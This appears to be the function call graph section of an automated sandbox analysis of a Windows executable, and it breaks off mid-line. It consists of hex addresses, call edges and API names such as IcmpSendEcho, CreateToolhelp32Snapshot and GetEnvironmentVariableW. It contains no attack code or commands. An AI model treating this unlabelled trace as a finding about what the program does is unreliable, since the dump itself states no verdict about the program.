Mailbox 114658->114688 114700 bc7eb8 Mailbox 114658->114700 114891 c3ccac 272 API calls 114658->114891 114893 c3cdc8 272 API calls 2 library calls 114659->114893 114892 c2a48d 89 API calls 4 library calls 114661->114892 114666 c00c37 114662->114666 114681 bc7ea1 114662->114681 114662->114700 114663 bc53b0 272 API calls 114663->114674 114670 bd1c9c 59 API calls 114666->114670 114667 c009e1 114890 bc5190 59 API calls Mailbox 114667->114890 114669 c00b3d 114668->114669 114676 c00b21 114668->114676 114669->114659 114895 c3a8fd 114669->114895 114670->114700 114671 bc806a 114671->114624 114674->114658 114674->114663 114674->114667 114674->114671 114675 bc8015 114674->114675 114702 bc7fb2 114674->114702 114675->114688 114889 c2a48d 89 API calls 4 library calls 114675->114889 114894 c2a48d 89 API calls 4 library calls 114676->114894 114677 c00d0b 114684 c00d41 114677->114684 114986 c3c9c9 95 API calls Mailbox 114677->114986 114678 c00a33 114683 bd1c9c 59 API calls 114678->114683 114681->114700 114966 c17aad 59 API calls 114681->114966 114683->114700 114690 bc523c 59 API calls 114684->114690 114685 c00bb7 114922 c27ed5 59 API calls 114685->114922 114687 c00ce9 114968 bc4d37 114687->114968 114688->114678 114688->114700 114888 c17aad 59 API calls 114688->114888 114695 bc7ee7 114690->114695 114692 bc8115 114692->114624 114694 c00d1f 114698 bc4d37 84 API calls 114694->114698 114695->114624 114697 c00cf1 __NMSG_WRITE 114697->114677 114710 bc523c 59 API calls 114697->114710 114705 c00d27 __NMSG_WRITE 114698->114705 114699 c00b6b 114902 c2789a 114699->114902 114700->114677 114700->114695 114967 c3c87c 85 API calls 2 library calls 114700->114967 114701 c00bc9 114923 bd35b9 59 API calls Mailbox 114701->114923 114702->114692 114887 bc4230 59 API calls Mailbox 114702->114887 114705->114684 114712 bc523c 59 API calls 114705->114712 114707 c00bd2 Mailbox 114713 c2789a 59 API calls 114707->114713 114710->114677 114712->114684 114714 c00beb 114713->114714 114924 bcb020 114714->114924 114717 bc6e4a 114716->114717 114720 bc6ff7 114716->114720 114718 bc74d0 114717->114718 114717->114720 114721 bc6f2c 114717->114721 114725 bc6fdb 114717->114725 114718->114725 115752 bc49e0 59 API calls wcstoxq 114718->115752 114720->114718 114720->114725 114727 bc7076 114720->114727 114732 bc6fbb Mailbox 114720->114732 114724 bc6f68 114721->114724 114721->114725 114721->114727 114723 bffc1e 114728 bffc30 114723->114728 115750 be3f69 59 API calls __wtof_l 114723->115750 114724->114725 114730 bffa71 114724->114730 114724->114732 114725->114624 114727->114723 114727->114725 114727->114732 115749 c17aad 59 API calls 114727->115749 114728->114624 114730->114725 115748 be3f69 59 API calls __wtof_l 114730->115748 114732->114723 114732->114725 115751 bc41c4 59 API calls Mailbox 114732->115751 114734 bc53cf 114733->114734 114756 bc53fd Mailbox 114733->114756 114735 be0fe6 Mailbox 59 API calls 114734->114735 114735->114756 114736 be2f70 67 API calls __cinit 114736->114756 114737 bc69fa 114738 bd1c9c 59 API calls 114737->114738 114757 bc5569 Mailbox 114738->114757 114739 c17aad 59 API calls 114739->114756 114740 bc69ff 114741 bff165 114740->114741 114742 bfe691 114740->114742 115757 c2a48d 89 API calls 4 library calls 114741->115757 115753 c2a48d 89 API calls 4 library calls 114742->115753 114743 be0fe6 59 API calls Mailbox 114743->114756 114745 bc6e30 60 API calls 114745->114756 114747 bfe6a0 114747->114612 114748 bd1c9c 59 API calls 114748->114756 114749 bfea9a 114751 bd1c9c 59 API calls 114749->114751 114751->114757 114752 bd1207 59 API calls 114752->114756 114753 bc7e50 272 API calls 114753->114756 114754 bfeb67 114754->114757 115754 c17aad 59 API calls 114754->115754 114756->114736 114756->114737 114756->114739 114756->114740 114756->114742 114756->114743 114756->114745 114756->114748 114756->114749 114756->114752 114756->114753 114756->114754 114756->114757 114758 bfef28 114756->114758 114760 bc5a1a 114756->114760 114757->114612 115755 c2a48d 89 API calls 4 library calls 114758->115755 115756 c2a48d 89 API calls 4 library calls 114760->115756 114762 c3ebcd 114761->114762 114763 bc4d37 84 API calls 114762->114763 114766 c3ebdc 114762->114766 114764 c3ec0a 114763->114764 115758 c27ce4 114764->115758 114766->114629 114769 c3ecab 114767->114769 114774 c3ec84 114767->114774 114768 c3eccd 114772 c3ed11 114768->114772 114768->114774 115803 bc502b 59 API calls 114768->115803 114769->114768 115802 bc502b 59 API calls 114769->115802 115799 c267fc 114772->115799 114774->114629 114776 bc4d37 84 API calls 114775->114776 114777 bcd001 114776->114777 115804 bc5278 114777->115804 114779 bcd018 114780 bcd57b 114779->114780 114785 bcd439 Mailbox __NMSG_WRITE 114779->114785 115824 bc502b 59 API calls 114779->115824 114780->114629 114782 be312d _W_store_winword 60 API calls 114782->114785 114783 bd162d 59 API calls 114783->114785 114784 be0c65 62 API calls 114784->114785 114785->114780 114785->114782 114785->114783 114785->114784 114787 bc4f98 59 API calls 114785->114787 114789 bc4d37 84 API calls 114785->114789 114790 bc502b 59 API calls 114785->114790 114791 bd1821 59 API calls 114785->114791 115809 bd59d3 114785->115809 115820 bd5ac3 114785->115820 115825 bd153b 59 API calls 2 library calls 114785->115825 115826 bc4f3c 59 API calls Mailbox 114785->115826 114787->114785 114789->114785 114790->114785 114791->114785 114795 c3d1c6 128 API calls 114794->114795 114796 c3e61c 114795->114796 114796->114629 114798 c35e46 114797->114798 114799 c35e74 #115 114798->114799 115877 bc502b 59 API calls 114798->115877 114800 c35e9d 114799->114800 114812 c35e88 Mailbox 114799->114812 115864 bd40cd 114800->115864 114803 c35e61 114803->114799 115878 bc502b 59 API calls 114803->115878 114806 bc4d37 84 API calls 114808 c35eb2 114806->114808 114807 c35e70 114807->114799 115869 bd402a WideCharToMultiByte 114808->115869 114810 c35ebf #10 #52 114811 c35edd IcmpCreateFile 114810->114811 114810->114812 114811->114812 114813 c35f01 114811->114813 114812->114629 114814 be0fe6 Mailbox 59 API calls 114813->114814 114815 c35f1a 114814->114815 114816 bd433f 59 API calls 114815->114816 114817 c35f25 114816->114817 114818 c35f55 IcmpSendEcho 114817->114818 114819 c35f34 IcmpSendEcho 114817->114819 114821 c35f6d 114818->114821 114819->114821 114820 c35fd4 IcmpCloseHandle #116 114820->114812 114821->114820 114823 c3c380 114822->114823 114824 c3c39a 114822->114824 115881 c2a48d 89 API calls 4 library calls 114823->115881 114825 c3a8fd 59 API calls 114824->114825 114827 c3c3a5 114825->114827 114828 bc53b0 271 API calls 114827->114828 114829 c3c406 114828->114829 114830 c3c392 Mailbox 114829->114830 114831 c3c498 114829->114831 114832 c3c447 114829->114832 114830->114612 114833 c3c4ee 114831->114833 114834 c3c49e 114831->114834 114840 c2789a 59 API calls 114832->114840 114833->114830 114835 bc4d37 84 API calls 114833->114835 115882 c27ed5 59 API calls 114834->115882 114836 c3c500 114835->114836 114838 bd1aa4 59 API calls 114836->114838 114841 c3c524 CharUpperBuffW 114838->114841 114839 c3c4c1 115883 bd35b9 59 API calls Mailbox 114839->115883 114843 c3c477 114840->114843 114846 c3c53e 114841->114846 114845 c16ebc 271 API calls 114843->114845 114844 c3c4c9 Mailbox 114849 bcb020 271 API calls 114844->114849 114845->114830 114847 c3c591 114846->114847 114848 c3c545 114846->114848 114850 bc4d37 84 API calls 114847->114850 114853 c2789a 59 API calls 114848->114853 114849->114830 114851 c3c599 114850->114851 115884 bc5376 60 API calls 114851->115884 114854 c3c573 114853->114854 114855 c16ebc 271 API calls 114854->114855 114855->114830 114856 c3c5a3 114856->114830 114857 bc4d37 84 API calls 114856->114857 114858 c3c5be 114857->114858 115885 bd35b9 59 API calls Mailbox 114858->115885 114860 c3c5ce 114861 bcb020 271 API calls 114860->114861 114861->114830 114862->114629 114864 bc524a 114863->114864 114865 bc5250 114863->114865 114864->114865 114866 bd1c9c 59 API calls 114864->114866 114865->114612 114866->114865 114867->114614 114868->114613 114869->114620 114870->114622 114872 bd1caf 114871->114872 114873 bd1ca7 114871->114873 114872->114612 114874 bd1bcc 59 API calls 114873->114874 114874->114872 114875->114612 114876->114612 114877->114629 114878->114634 114879->114636 114880->114650 114881->114598 114882->114636 114883->114598 114884->114598 114885->114636 114886->114636 114887->114675 114888->114688 114889->114667 114890->114658 114891->114658 114892->114659 114893->114700 114894->114695 114896 c00b53 114895->114896 114897 c3a918 114895->114897 114896->114685 114896->114699 114898 be0fe6 Mailbox 59 API calls 114897->114898 114901 c3a93a 114898->114901 114899 be0fe6 Mailbox 59 API calls 114899->114901 114901->114896 114901->114899 114987 c1715b 59 API calls Mailbox 114901->114987 114903 c278ac 114902->114903 114905 c00b8d 114902->114905 114904 be0fe6 Mailbox 59 API calls 114903->114904 114903->114905 114904->114905 114906 c16ebc 114905->114906 114907 c16f06 114906->114907 114914 c16f1c Mailbox 114906->114914 114910 bd1a36 59 API calls 114907->114910 114908 c16f47 114911 c3c355 272 API calls 114908->114911 114909 c16f5a 114988 bca820 114909->114988 114910->114914 114915 c16f53 114911->114915 114914->114908 114914->114909 115012 c16cf1 59 API calls Mailbox 114915->115012 114916 c17002 114916->114658 114917 c16f91 114917->114915 114918 c16fdc 114917->114918 114920 c16fc1 114917->114920 114918->114915 115011 c2a48d 89 API calls 4 library calls 114918->115011 115005 c1706d 114920->115005 114922->114701 114923->114707 115257 bd3740 114924->115257 114926 c030b6 115361 c2a48d 89 API calls 4 library calls 114926->115361 114929 bcb07f 114929->114926 114930 c030d4 114929->114930 114940 bcb132 Mailbox _memmove 114929->114940 114962 bcbb86 114929->114962 115362 c2a48d 89 API calls 4 library calls 114930->115362 114932 c0355e 114965 bcb4dd 114932->114965 115392 c2a48d 89 API calls 4 library calls 114932->115392 114933 c0318a 114933->114965 115364 c2a48d 89 API calls 4 library calls 114933->115364 114934 c03106 114934->114933 115363 bca9de 272 API calls 114934->115363 114940->114932 114940->114934 114942 bc53b0 272 API calls 114940->114942 114943 bc3b31 59 API calls 114940->114943 114944 c1730a 59 API calls 114940->114944 114947 c03418 114940->114947 114953 c031c3 114940->114953 114954 bc3c30 68 API calls 114940->114954 114956 c0346f 114940->114956 114959 bc523c 59 API calls 114940->114959 114961 bd1c9c 59 API calls 114940->114961 114940->114962 114963 be0fe6 59 API calls Mailbox 114940->114963 114940->114965 115262 bc3add 114940->115262 115269 bcbc70 114940->115269 115348 bc3a40 114940->115348 115359 bc5190 59 API calls Mailbox 114940->115359 115366 c16c62 59 API calls 2 library calls 114940->115366 115367 c3a9c3 85 API calls Mailbox 114940->115367 115368 c16c1e 59 API calls Mailbox 114940->115368 115369 c25ef2 68 API calls 114940->115369 115370 bc3ea3 114940->115370 115391 c2a12a 59 API calls 114940->115391 114942->114940 114943->114940 114944->114940 114948 bc53b0 272 API calls 114947->114948 114950 c03448 114948->114950 114950->114965 115386 bc39be 114950->115386 115365 c2a48d 89 API calls 4 library calls 114953->115365 114954->114940 115390 c2a48d 89 API calls 4 library calls 114956->115390 114959->114940 114961->114940 115360 c2a48d 89 API calls 4 library calls 114962->115360 114963->114940 114965->114658 114966->114700 114967->114687 114969 bc4d51 114968->114969 114978 bc4d4b 114968->114978 114970 bfdb28 __i64tow 114969->114970 114971 bc4d99 114969->114971 114973 bc4d57 __itow 114969->114973 114977 bfda2f 114969->114977 115746 be38c8 83 API calls 4 library calls 114971->115746 114975 be0fe6 Mailbox 59 API calls 114973->114975 114976 bc4d71 114975->114976 114976->114978 114980 bd1a36 59 API calls 114976->114980 114979 be0fe6 Mailbox 59 API calls 114977->114979 114984 bfdaa7 Mailbox _wcscpy 114977->114984 114978->114697 114981 bfda74 114979->114981 114980->114978 114982 be0fe6 Mailbox 59 API calls 114981->114982 114983 bfda9a 114982->114983 114983->114984 114985 bd1a36 59 API calls 114983->114985 115747 be38c8 83 API calls 4 library calls 114984->115747 114985->114984 114986->114694 114987->114901 114989 c02d51 114988->114989 114992 bca84c 114988->114992 115014 c2a48d 89 API calls 4 library calls 114989->115014 114991 c02d62 114991->114917 114993 c02d6a 114992->114993 114998 bca888 _memmove 114992->114998 115015 c2a48d 89 API calls 4 library calls 114993->115015 114995 bca975 114995->114917 114997 be0fe6 59 API calls Mailbox 114997->114998 114998->114995 114998->114997 114999 c02dae 114998->114999 115000 bc53b0 272 API calls 114998->115000 115002 c02dc8 114998->115002 115004 bca962 114998->115004 115016 bca9de 272 API calls 114999->115016 115000->114998 115002->114995 115017 c2a48d 89 API calls 4 library calls 115002->115017 115004->114995 115013 c3a9c3 85 API calls Mailbox 115004->115013 115006 c17085 115005->115006 115018 c3495b 115006->115018 115027 bcec83 115006->115027 115102 c3f1b2 115006->115102 115007 c170d9 115007->114915 115011->114915 115012->114916 115013->114995 115014->114991 115015->114995 115016->115002 115017->114995 115019 be0fe6 Mailbox 59 API calls 115018->115019 115020 c3496c 115019->115020 115021 bd433f 59 API calls 115020->115021 115022 c34976 115021->115022 115023 bc4d37 84 API calls 115022->115023 115024 c3498d GetEnvironmentVariableW 115023->115024 115107 c27a51 59 API calls Mailbox 115024->115107 115026 c349aa 115026->115007 115028 bc4d37 84 API calls 115027->115028 115029 bceca2 115028->115029 115030 bc4d37 84 API calls 115029->115030 115031 bcecb7 115030->115031 115032 bc4d37 84 API calls 115031->115032 115033 bcecca 115032->115033 115034 bc4d37 84 API calls 115033->115034 115035 bcece0 115034->115035 115108 bd162d 115035->115108 115038 bced19 115040 c05b67 115038->115040 115066 bced43 __wopenfile 115038->115066 115041 bc47be 59 API calls 115040->115041 115042 c05b7a 115041->115042 115044 bc4540 59 API calls 115042->115044 115043 bc47be 59 API calls 115045 c05d4a 115043->115045 115046 c05b8c 115044->115046 115048 c05d53 115045->115048 115049 c05d97 115045->115049 115053 bc43d0 59 API calls 115046->115053 115078 c05bb1 115046->115078 115047 bc4d37 84 API calls 115050 bcedca 115047->115050 115052 bc4540 59 API calls 115048->115052 115054 bc4540 59 API calls 115049->115054 115055 bc4d37 84 API calls 115050->115055 115051 bcef0c Mailbox 115051->115007 115058 c05d5e 115052->115058 115053->115078 115059 c05da1 115054->115059 115060 bceddf 115055->115060 115057 c05c0f 115069 bc4540 59 API calls 115057->115069 115098 bcef3e 115057->115098 115062 bc4d37 84 API calls 115058->115062 115061 bc43d0 59 API calls 115059->115061 115060->115098 115114 bc47be 115060->115114 115063 c05dbd 115061->115063 115067 c05d70 115062->115067 115075 bc4d37 84 API calls 115063->115075 115065 bc477a 59 API calls 115065->115078 115066->115047 115066->115057 115091 bcee30 __wopenfile 115066->115091 115066->115098 115140 bd1364 59 API calls 2 library calls 115067->115140 115073 c05c76 115069->115073 115071 bcee09 115120 bc4540 115071->115120 115072 bc43d0 59 API calls 115072->115078 115079 bc43d0 59 API calls 115073->115079 115074 c05d84 115080 bc477a 59 API calls 115074->115080 115081 c05dd8 115075->115081 115078->115051 115078->115065 115078->115072 115138 bd1364 59 API calls 2 library calls 115078->115138 115079->115091 115083 c05d92 115080->115083 115141 bd1364 59 API calls 2 library calls 115081->115141 115088 bc43d0 59 API calls 115083->115088 115085 bd19e1 59 API calls 115085->115091 115087 c05dec 115089 bc477a 59 API calls 115087->115089 115088->115051 115089->115083 115091->115051 115092 c05cc2 115091->115092 115125 bd1364 59 API calls 2 library calls 115091->115125 115126 bc477a 115091->115126 115129 bc43d0 115091->115129 115093 c05cfb 115092->115093 115094 c05cec 115092->115094 115095 bc477a 59 API calls 115093->115095 115139 bd153b 59 API calls 2 library calls 115094->115139 115097 c05d09 115095->115097 115099 bc43d0 59 API calls 115097->115099 115098->115043 115100 c05d1c 115099->115100 115101 bd19e1 59 API calls 115100->115101 115101->115098 115103 bc4d37 84 API calls 115102->115103 115104 c3f1cf 115103->115104 115153 c24148 CreateToolhelp32Snapshot Process32FirstW 115104->115153 115106 c3f1de 115106->115007 115107->115026 115109 be0fe6 Mailbox 59 API calls 115108->115109 115110 bd1652 115109->115110 115111 be0fe6 Mailbox 59 API calls 115110->115111 115112 bcecf4 115111->115112 115112->115038 115113 bc502b 59 API calls 115112->115113 115113->115038 115115 bc47c6 115114->115115 115116 be0fe6 Mailbox 59 API calls 115115->115116 115117 bc47d4 115116->115117 115118 bc47e0 115117->115118 115142 bc46ec 59 API calls Mailbox 115117->115142 115118->115057 115118->115071 115143 bc4650 115120->115143 115122 bc454f 115123 be0fe6 Mailbox 59 API calls 115122->115123 115124 bc45eb 115122->115124 115123->115124 115124->115085 115125->115091 115127 be0fe6 Mailbox 59 API calls 115126->115127 115128 bc4787 115127->115128 115128->115091 115130 bfd6c9 115129->115130 115132 bc43e7 115129->115132 115130->115132 115152 bc40cb 59 API calls Mailbox 115130->115152 115133 bc44ef 115132->115133 115134 bc44e8 115132->115134 115135 bc4530 115132->115135 115133->115091 115137 be0fe6 Mailbox 59 API calls 115134->115137 115136 bc523c 59 API calls 115135->115136 115136->115133 115137->115133 115138->115078 115139->115098 115140->115074 115141->115087 115142->115118 115144 bc4659 Mailbox 115143->115144 115145 bfd6ec 115144->115145 115150 bc4663 115144->115150 115146 be0fe6 Mailbox 59 API calls 115145->115146 115148 bfd6f8 115146->115148 115147 bc466a 115147->115122 115150->115147 115151 bc5190 59 API calls Mailbox 115150->115151 115151->115150 115152->115132 115163 c24ce2 115153->115163 115155 c24244 CloseHandle 115155->115106 115156 c24195 Process32NextW 115156->115155 115161 c2418e Mailbox 115156->115161 115157 bd1207 59 API calls 115157->115161 115158 bd1a36 59 API calls 115158->115161 115161->115155 115161->115156 115161->115157 115161->115158 115169 be0119 115161->115169 115220 bd17e0 115161->115220 115229 bd151f 61 API calls 115161->115229 115164 c24d09 115163->115164 115166 c24cf0 115163->115166 115231 be37c3 59 API calls __wcstoi64 115164->115231 115166->115164 115168 c24d0f 115166->115168 115230 be385c GetStringTypeW _iswctype 115166->115230 115168->115161 115170 bd1207 59 API calls 115169->115170 115171 be012f 115170->115171 115172 bd1207 59 API calls 115171->115172 115173 be0137 115172->115173 115174 bd1207 59 API calls 115173->115174 115175 be013f 115174->115175 115176 bd1207 59 API calls 115175->115176 115177 be0147 115176->115177 115178 be017b 115177->115178 115179 c1627d 115177->115179 115180 bd1462 59 API calls 115178->115180 115181 bd1c9c 59 API calls 115179->115181 115182 be0189 115180->115182 115183 c16286 115181->115183 115184 bd1981 59 API calls 115182->115184 115185 bd19e1 59 API calls 115183->115185 115186 be0193 115184->115186 115188 be01be 115185->115188 115187 bd1462 59 API calls 115186->115187 115186->115188 115191 be01b4 115187->115191 115189 be01fe 115188->115189 115192 be01dd 115188->115192 115202 c162a6 115188->115202 115232 bd1462 115189->115232 115195 bd1981 59 API calls 115191->115195 115245 bd1609 115192->115245 115194 be020f 115198 be0221 115194->115198 115200 bd1c9c 59 API calls 115194->115200 115195->115188 115196 c16376 115199 bd1821 59 API calls 115196->115199 115201 be0231 115198->115201 115206 bd1c9c 59 API calls 115198->115206 115215 c16333 115199->115215 115200->115198 115204 be0238 115201->115204 115207 bd1c9c 59 API calls 115201->115207 115202->115196 115203 c1635f 115202->115203 115217 c162dd 115202->115217 115203->115196 115212 c1634a 115203->115212 115208 bd1c9c 59 API calls 115204->115208 115209 be023f Mailbox 115204->115209 115205 bd1462 59 API calls 115205->115189 115206->115201 115207->115204 115208->115209 115209->115161 115210 bd1609 59 API calls 115210->115215 115211 c1633b 115213 bd1821 59 API calls 115211->115213 115214 bd1821 59 API calls 115212->115214 115213->115215 115214->115215 115215->115189 115215->115210 115248 bd153b 59 API calls 2 library calls 115215->115248 115217->115211 115218 c16326 115217->115218 115219 bd1821 59 API calls 115218->115219 115219->115215 115221 c0f401 115220->115221 115222 bd17f2 115220->115222 115256 c187f9 59 API calls _memmove 115221->115256 115250 bd1680 115222->115250 115225 c0f40b 115227 bd1c9c 59 API calls 115225->115227 115226 bd17fe 115226->115161 115228 c0f413 Mailbox 115227->115228 115229->115161 115230->115166 115231->115168 115233 bd14ce 115232->115233 115234 bd1471 115232->115234 115235 bd1981 59 API calls 115233->115235 115234->115233 115236 bd147c 115234->115236 115237 bd149f _memmove 115235->115237 115238 bd1497 115236->115238 115239 c0f1de 115236->115239 115237->115194 115249 bd1b7c 59 API calls Mailbox 115238->115249 115240 bd1c7e 59 API calls 115239->115240 115242 c0f1e8 115240->115242 115243 be0fe6 Mailbox 59 API calls 115242->115243 115244 c0f208 115243->115244 115246 bd1aa4 59 API calls 115245->115246 115247 bd1614 115246->115247 115247->115189 115247->115205 115248->115215 115249->115237 115251 bd1692 115250->115251 115255 bd16ba _memmove 115250->115255 115252 be0fe6 Mailbox 59 API calls 115251->115252 115251->115255 115254 bd176f _memmove 115252->115254 115253 be0fe6 Mailbox 59 API calls 115253->115254 115254->115253 115255->115226 115256->115225 115258 bd374f 115257->115258 115261 bd376a 115257->115261 115259 bd1aa4 59 API calls 115258->115259 115260 bd3757 CharUpperBuffW 115259->115260 115260->115261 115261->114929 115263 bfd3cd 115262->115263 115264 bc3aee 115262->115264 115265 be0fe6 Mailbox 59 API calls 115264->115265 115266 bc3af5 115265->115266 115267 bc3b16 115266->115267 115393 bc3ba5 59 API calls Mailbox 115266->115393 115267->114940 115270 c0359f 115269->115270 115281 bcbc95 115269->115281 115462 c2a48d 89 API calls 4 library calls 115270->115462 115272 bcbf3b 115272->114940 115276 bcc2b6 115276->115272 115277 bcc2c3 115276->115277 115460 bcc483 272 API calls Mailbox 115277->115460 115280 bcc2ca LockWindowUpdate DestroyWindow GetMessageW 115280->115272 115282 bcc2fc 115280->115282 115342 bcbca5 Mailbox 115281->115342 115463 bc5376 60 API calls 115281->115463 115464 c1700c 272 API calls 115281->115464 115284 c04509 TranslateMessage DispatchMessageW GetMessageW 115282->115284 115283 c036b3 Sleep 115283->115342 115284->115284 115285 c04539 115284->115285 115285->115272 115286 c0405d WaitForSingleObject 115290 c0407d GetExitCodeProcess CloseHandle 115286->115290 115286->115342 115287 bcbf54 timeGetTime 115287->115342 115289 bcc210 Sleep 115323 bcc1fa Mailbox 115289->115323 115294 bcc36b 115290->115294 115291 bd1207 59 API calls 115291->115323 115292 bd1c9c 59 API calls 115292->115342 115293 c043a9 Sleep 115293->115323 115294->114940 115295 be0fe6 59 API calls Mailbox 115295->115342 115297 be083e timeGetTime 115297->115323 115299 bcc324 timeGetTime 115461 bc5376 60 API calls 115299->115461 115300 c24148 66 API calls 115300->115323 115302 bc4d37 84 API calls 115302->115342 115303 c04440 GetExitCodeProcess 115308 c04456 WaitForSingleObject 115303->115308 115309 c0446c CloseHandle 115303->115309 115304 c46562 110 API calls 115304->115323 115307 bc6d79 109 API calls 115307->115342 115308->115309 115308->115342 115309->115323 115310 c038aa Sleep 115310->115342 115311 c044c8 Sleep 115311->115342 115312 bd1a36 59 API calls 115312->115323 115317 bc5376 60 API calls 115317->115342 115318 bc3ea3 68 API calls 115318->115323 115319 bcc26d 115322 bd1a36 59 API calls 115319->115322 115320 bcb020 250 API calls 115320->115342 115326 bcbf25 Mailbox 115322->115326 115323->115289 115323->115291 115323->115294 115323->115297 115323->115300 115323->115303 115323->115304 115323->115310 115323->115311 115323->115312 115323->115318 115323->115342 115470 c22baf 60 API calls 115323->115470 115471 bc5376 60 API calls 115323->115471 115472 bc6cd8 272 API calls 115323->115472 115473 c170e2 59 API calls 115323->115473 115474 c257ff QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 115323->115474 115325 c2a48d 89 API calls 115325->115342 115326->115272 115459 bcc460 10 API calls Mailbox 115326->115459 115327 c3c355 250 API calls 115327->115342 115329 bd1a36 59 API calls 115329->115342 115330 bca820 250 API calls 115330->115342 115331 bc3ea3 68 API calls 115331->115342 115332 c16cf1 59 API calls Mailbox 115332->115342 115333 bc39be 68 API calls 115333->115342 115334 bc6cd8 250 API calls 115334->115342 115335 bc53b0 250 API calls 115335->115342 115336 bc3a40 59 API calls 115336->115342 115337 c03e13 #9 115337->115342 115338 bc41c4 59 API calls Mailbox 115338->115342 115339 c03ea9 #9 115339->115342 115340 c17aad 59 API calls 115340->115342 115341 c03c57 #9 115341->115342 115342->115283 115342->115286 115342->115287 115342->115289 115342->115292 115342->115293 115342->115294 115342->115295 115342->115299 115342->115302 115342->115307 115342->115317 115342->115319 115342->115320 115342->115323 115342->115325 115342->115326 115342->115327 115342->115329 115342->115330 115342->115331 115342->115332 115342->115333 115342->115334 115342->115335 115342->115336 115342->115337 115342->115338 115342->115339 115342->115340 115342->115341 115343 bc5190 59 API calls Mailbox 115342->115343 115347 c3e60c 128 API calls 115342->115347 115394 bc52b0 115342->115394 115403 bc9a00 115342->115403 115410 bc9c80 115342->115410 115441 c3e620 115342->115441 115444 c2c270 115342->115444 115451 c3eedb 115342->115451 115465 c46655 59 API calls 115342->115465 115466 c2a058 59 API calls Mailbox 115342->115466 115467 c1e0aa 59 API calls 115342->115467 115468 c16c62 59 API calls 2 library calls 115342->115468 115469 bc38ff 59 API calls 115342->115469 115343->115342 115347->115342 115349 bfd3b1 115348->115349 115353 bc3a53 115348->115353 115350 bfd3c1 115349->115350 115736 c16d17 59 API calls 115349->115736 115352 bc3a7d 115355 bc3a83 115352->115355 115727 bc3b31 115352->115727 115353->115352 115354 bc3b31 59 API calls 115353->115354 115358 bc3a9a Mailbox 115353->115358 115354->115352 115355->115358 115735 bc5190 59 API calls Mailbox 115355->115735 115358->114940 115359->114940 115360->114926 115361->114965 115362->114965 115363->114933 115364->114965 115365->114965 115366->114940 115367->114940 115368->114940 115369->114940 115738 bc3c30 115370->115738 115372 bc3eb3 115373 bc3f2d 115372->115373 115374 bc3ebd 115372->115374 115376 bc523c 59 API calls 115373->115376 115375 be0fe6 Mailbox 59 API calls 115374->115375 115378 bc3ece 115375->115378 115379 bc3f1d 115376->115379 115377 bc3edc 115381 bc3eeb 115377->115381 115382 bd1bcc 59 API calls 115377->115382 115378->115377 115380 bd1207 59 API calls 115378->115380 115379->114940 115380->115377 115383 be0fe6 Mailbox 59 API calls 115381->115383 115382->115381 115384 bc3ef5 115383->115384 115745 bc3bc8 68 API calls 115384->115745 115387 bc39c9 115386->115387 115388 bc3ea3 68 API calls 115387->115388 115389 bc39f0 115387->115389 115388->115389 115389->114956 115390->114965 115391->114940 115392->114965 115393->115267 115395 bc52c6 115394->115395 115397 bc5313 115394->115397 115396 bc52d3 PeekMessageW 115395->115396 115395->115397 115396->115397 115398 bc52ec 115396->115398 115397->115398 115400 bfdf68 TranslateAcceleratorW 115397->115400 115401 bc533e PeekMessageW 115397->115401 115402 bc5352 TranslateMessage DispatchMessageW 115397->115402 115475 bc359e 115397->115475 115398->115342 115400->115397 115400->115401 115401->115397 115401->115398 115402->115401 115404 bc9a1d 115403->115404 115405 bc9a31 115403->115405 115480 bc94e0 115404->115480 115514 c2a48d 89 API calls 4 library calls 115405->115514 115407 bc9a28 115407->115342 115409 c02478 115409->115409 115411 bc9cb5 115410->115411 115412 c0247d 115411->115412 115414 bc9d1f 115411->115414 115425 bc9d79 115411->115425 115413 bc53b0 272 API calls 115412->115413 115415 c02492 115413->115415 115418 bd1207 59 API calls 115414->115418 115414->115425 115440 bc9f50 Mailbox 115415->115440 115535 c2a48d 89 API calls 4 library calls 115415->115535 115416 bd1207 59 API calls 115416->115425 115419 c024d8 115418->115419 115421 be2f70 __cinit 67 API calls 115419->115421 115420 be2f70 __cinit 67 API calls 115420->115425 115421->115425 115422 c024fa 115422->115342 115423 bc39be 68 API calls 115423->115440 115424 bc53b0 272 API calls 115424->115440 115425->115416 115425->115420 115425->115422 115427 bc9f3a 115425->115427 115425->115440 115427->115440 115536 c2a48d 89 API calls 4 library calls 115427->115536 115428 bc4230 59 API calls 115428->115440 115429 bca775 115540 c2a48d 89 API calls 4 library calls 115429->115540 115433 c027f9 115433->115342 115437 c2a48d 89 API calls 115437->115440 115439 bca058 115439->115342 115440->115423 115440->115424 115440->115428 115440->115429 115440->115437 115440->115439 115531 bd1bcc 115440->115531 115537 c17aad 59 API calls 115440->115537 115538 c3ccac 272 API calls 115440->115538 115539 c3bc26 272 API calls Mailbox 115440->115539 115541 bc5190 59 API calls Mailbox 115440->115541 115542 c39ab0 272 API calls Mailbox 115440->115542 115543 c3d1c6 115441->115543 115443 c3e630 115443->115342 115445 bc4d37 84 API calls 115444->115445 115446 c2c286 115445->115446 115626 c24005 115446->115626 115448 c2c28e 115449 c2c292 GetLastError 115448->115449 115450 c2c2a7 115448->115450 115449->115450 115450->115342 115453 c3ef1e 115451->115453 115458 c3eef7 115451->115458 115452 c3ef40 115456 c3ef84 115452->115456 115452->115458 115686 bc502b 59 API calls 115452->115686 115453->115452 115685 bc502b 59 API calls 115453->115685 115652 c26818 115456->115652 115458->115342 115459->115276 115460->115280 115461->115342 115462->115281 115463->115281 115464->115281 115465->115342 115466->115342 115467->115342 115468->115342 115469->115342 115470->115323 115471->115323 115472->115323 115473->115323 115474->115323 115476 bc35b0 115475->115476 115477 bc35e2 115475->115477 115476->115477 115478 bc35d5 IsDialogMessageW 115476->115478 115479 bfd273 GetClassLongW 115476->115479 115477->115397 115478->115476 115478->115477 115479->115476 115479->115478 115481 bc53b0 272 API calls 115480->115481 115482 bc951f 115481->115482 115483 c02001 115482->115483 115497 bc9527 _memmove 115482->115497 115523 bc5190 59 API calls Mailbox 115483->115523 115485 c022c0 115529 c2a48d 89 API calls 4 library calls 115485->115529 115487 c022de 115487->115487 115488 bc9583 115488->115407 115489 bc9944 115492 be0fe6 Mailbox 59 API calls 115489->115492 115490 bc986a 115493 c022b1 115490->115493 115494 bc987f 115490->115494 115491 be0fe6 59 API calls Mailbox 115491->115497 115506 bc96e3 _memmove 115492->115506 115528 c3a983 59 API calls 115493->115528 115495 be0fe6 Mailbox 59 API calls 115494->115495 115505 bc977d 115495->115505 115497->115485 115497->115488 115497->115489 115497->115491 115498 bc96cf 115497->115498 115512 bc9741 115497->115512 115498->115489 115500 bc96dc 115498->115500 115499 be0fe6 Mailbox 59 